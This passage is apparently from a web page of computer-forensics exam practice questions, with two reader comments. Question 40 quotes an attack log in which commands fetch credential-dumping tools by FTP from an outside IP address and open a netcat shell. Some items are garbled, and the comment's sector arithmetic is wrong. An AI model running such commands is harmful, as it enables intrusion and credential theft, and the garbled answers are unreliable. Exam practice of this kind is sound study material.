12px;">He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">construct SQL statements that will execute shell commands (such as CMD. EXE) on the IIS server. He</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">functioning correctly. The attacker makes a RDS query which results in the commands run as shown</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">below.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">¡°cmd1.exe /c open 213.116.251.162 >ftpcom¡±</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">¡°cmd1.exe /c echo johna2k >>ftpcom¡±</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">¡°cmd1.exe /c echo haxedj00 >>ftpcom¡±</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">¡°cmd1.exe /c echo get nC. exe >>ftpcom¡±</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">¡°cmd1.exe /c echo get pdump.exe >>ftpcom¡±</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">¡°cmd1.exe /c echo get samdump.dll >>ftpcom¡±</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">¡°cmd1.exe /c echo quit >>ftpcom¡±</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">¡°cmd1.exe /c ftp -s:ftpcom¡±</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">¡°cmd1.exe /c nc -l -p 6969 -e cmd1.exe¡±</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">What can you infer from the exploit given?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. It is a local exploit where the attacker logs in using username johna2k</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. There are two attackers on the system . johna2k and haxedj00</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. The attack is a remote exploit and the hacker downloads three files</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Explanation:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">: The log clearly indicates that this is a remote exploit with three files being downloaded and hence the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">correct answer is C.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">41. When reviewing web logs, you see an entry for resource not found in the HTTP status code fileD. What is</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">the actual error code that you would see in the log for resource not found?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. 202</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. 404</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. 505</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. 909</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">42. You are called in to assist the police in an investigation involving a suspected drug dealer. The suspects</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">house was searched by the police after a warrant was obtained and they located a floppy disk in the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">suspects bedroom. The disk contains several files, but they appear to be password protecteD. What are two</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">common methods used by password cracking software that you can use to obtain the password?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Limited force and library attack</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Brute Force and dictionary Attack</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Maximum force and thesaurus Attack</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Minimum force and appendix Attack</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">43. When examining a hard disk without a write-blocker, you should not start windows because Windows will</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">write data to the:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Recycle Bin</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. MSDOS.sys</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. BIOS</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Case files</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">44. An Employee is suspected of stealing proprietary information belonging to your company that he had no</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">rights to possess. The information was stored on the Employees Computer that was protected with the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">NTFS Encrypted File System (EFS) and you had observed him copy the files to a floppy disk just before</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">leaving work for the weekenD. You detain the Employee before he leaves the building and recover the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">floppy disks and secure his computer. Will you be able to break the encryption so that you can verify that</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">that the employee was in possession of the proprietary information?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. EFS uses a 128-bit key that can.t be cracked, so you will not be able to recover the information</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. When the encrypted file was copied to the floppy disk, it was automatically unencrypted, so you can</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">recover the information</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. The EFS Revoked Key Agent can be used on the Computer to recover the information</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. When the Encrypted file was copied to the floppy disk, the EFS private key was also copied to the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">floppy disk, so you can recover the information.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">45. What type of file is represented by a colon (:) with a name following it in the Master File Table of NTFS</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">disk?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. A compressed file</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. A Data stream file</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. An encrypted file</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. A reserved file</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">46. In Microsoft file structures, sectors are grouped together to form:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Clusters</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Drives</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Bitstreams</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Partitions</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">47. While working for a prosecutor, What do you think you should do if the evidence you found appears to be</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">exculpatory and is not being released to the defense ?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Keep the information of file for later review</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Destroy the evidence</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Bring the information to the attention of the prosecutor, his or her supervisor or finally to the judge</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Present the evidence to the defense attorney</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">48. When a file is deleted by Windows Explorer or through the MS-DOS delete command, the operating</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">system inserts _______________ in the first letter position of the filename in the FAT database.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. A Capital X</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. A Blank Space</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. The Underscore Symbol</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. The lowercase Greek Letter Sigma (s)</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">49. When you carve an image, recovering the image depends on which of the following skills?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Recognizing the pattern of the header content</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Recovering the image from a tape backup</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Recognizing the pattern of a corrupt file</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Recovering the image from the tape backup</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">50. In General, __________________ Involves the investigation of data that can be retrieved from the hard</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">disk or other disks of a computer by applying scientific methods to retrieve the datA.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Network Forensics</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Data Recovery</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Disaster Recovery</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Computer Forensics</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">51. When conducting computer forensic analysis, you must guard against ______________ So that you remain</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">focused on the primary job and insure that the level of work does not increase beyond what was originally</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">expecteD.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Hard Drive Failure</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Scope Creep</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Unauthorized expenses</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Overzealous marketing</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">52. Which of the following is NOT a graphics file ?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Picture1.tga</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Picture2.bmp</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Picture3.nfo</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Picture4.psd</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">53. You have used a newly released forensic investigation tool, which doesn.t meet the Daubert Test, during a</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">case. The case has ended-up in court. What argument could the defense make to weaken your case?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. The tool hasn.t been tested by the International Standards Organization (ISO)</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Only the local law enforcement should use the tool</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. The total has not been reviewed and accepted by your peers</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. You are not certified for using the tool</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">54. Windows identifies which application to open a file with by examining which of the following?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. The File extension</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. The file attributes</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. The file Signature at the end of the file</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. The file signature at the beginning of the file</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">55. With Regard to using an Antivirus scanner during a computer forensics investigation, You should:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Scan the suspect hard drive before beginning an investigation</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Never run a scan on your forensics workstation because it could change your systems configuration</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Scan your forensics workstation at intervals of no more than once every five minutes during an</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">investigation</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Scan your Forensics workstation before beginning an investigation</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">56. To make sure the evidence you recover and analyze with computer forensics software can be admitted in</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">court, you must test and validate the software. What group is actively providing tools and creating</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">procedures for testing and validating computer forensics software ?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Computer Forensics Tools and Validation Committee (CFTVC)</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Association of Computer Forensics Software Manufactures (ACFSM)</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. National Institute of Standards and Technology (NIST)</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Society for Valid Forensics Tools and Testing (SVFTT)</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">57. Bob has been trying to penetrate a remote production system for the past tow weeks. This time however, he</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">is able to get into the system. He was able to use the System for a period of three weeks. However law</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">enforcement agencies were recoding his every activity and this was later presented as evidence.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">The organization had used a Virtual Environment to trap BoB. What is a Virtual Environment?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. A Honeypot that traps hackers</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. A system Using Trojaned commands</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. An environment set up after the user logs in</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. An environment set up before an user logs in</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">58. When investigating a network that uses DHCP to assign IP addresses, where would you look to determine</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">which system (MAC address) had a specific IP address at a specific time?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. on the individual computer.s ARP cache</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. in the Web Server log files</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. in the DHCP Server log files</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. there is no way to determine the specific IP address</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">59. You are called by an author who is writing a book and he wants to know how long the copyright for his</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">book will last after he has the book published?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. 70 years</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. the life of the author</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. the life of the author plus 70 years</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. copyrights last forever</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">60. How many sectors will a 125 KB file use in a FAT32 file system?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. 32</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. 16</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. 250</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. 25</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">1. doni says:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">March 21, 2012 at 5:07 am</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">can you explain me about 125 KB file use in a FAT32 ?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Reply</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">2. mr_tienvu says:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">March 21, 2012 at 9:32 am</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">The answer is 250 sectors.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">125 x 1024 bytes per KB = 128,000 total bytes in the file. 128,000 bytes / 512 sectors per cluster = 250</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">sectors</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">61. When performing a forensics analysis, what device is used to prevent the system from recording data on an</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">evidence disk?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. a write-blocker</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. a protocol analyzer</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. a firewall</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. a disk editor</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">62. You have been asked to investigate the possibility of computer fraud in the finance department of a</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">company. It is suspected that a staff member has been committing finance fraud by printing cheques that</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">have not been authorizeD. You have exhaustively searched all data files on a bitmap image of the target</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">computer, but have found no evidence. You suspect the files may not have been saveD. What should you</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">examine next in this case?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. The registry</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Theswapfile</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. The recycle bin</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. The metadata</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">63. In a FAT32 system, a 123 KB file will use how many sectors?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. 34</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. 246</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. 11</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. 56</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">64. Under which Federal Statutes does FBI investigate for computer crimes involving e-mail scams and mail</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">fraud?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. 18 U.S.C. 1029 Possession of Access Devices</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. 18 U.S.C. 1030 Fraud and related activity in connection with computers</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. 18 U.S.C. 1343 Fraud by wire, radio or television</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. 18 U.S.C. 1361 Injury to Government Property</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">E.18 U.S.C. 1362 Government communication systems</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">G.18 U.S.C. 1832 Trade Secrets Act</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Explanation:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">18 U.S.C. 1831 Economic Espionage Act</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">65. What TCP/UDP port does the toolkit program netstat use?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Port 7</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Port 15</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Port 23</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Port 69</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">66. Office documents (Word, Excel, PowerPoint) contain a code that allows tracking the MAC, or unique</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">identifier, of the machine that created the document.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">What is that code called?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. the Microsoft Virtual Machine Identifier</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. the Personal Application Protocol</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. the Globally Unique ID</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. the Individual ASCII String</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">67. Which federal computer crime law specifically refers to fraud and related activity in connection with access</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">devices like routers?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. 18 U.S.C. 1029</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. 18 U.S.C. 1362</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. 18 U.S.C. 2511</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. 18 U.S.C. 2703</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">68. Which response organization tracks hoaxes as well as viruses?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. NIPC</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. FEDCIRC</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. CERT</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. CIAC</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">69. What method of computer forensics will allow you to trace all ever-established user accounts on a</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Windows 2000 sever the course of its lifetime?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. forensic duplication of hard drive</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. analysis of volatile data</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. comparison of MD5 checksums</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. review of SIDs in the Registry</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">70. What header field in the TCP/IP protocol stack involves the hacker exploit known as the Ping of Death?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. ICMP header field</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. TCP header field</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. IP header field</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. UDP header field</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">71. Why should you note all cable connections for a computer you want to seize as evidence?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. to know what outside connections existed</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. in case other devices were connected</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. to know what peripheral devices exist</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. to know what hardware existed</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">72. You should make at least how many bit-stream copies of a suspect 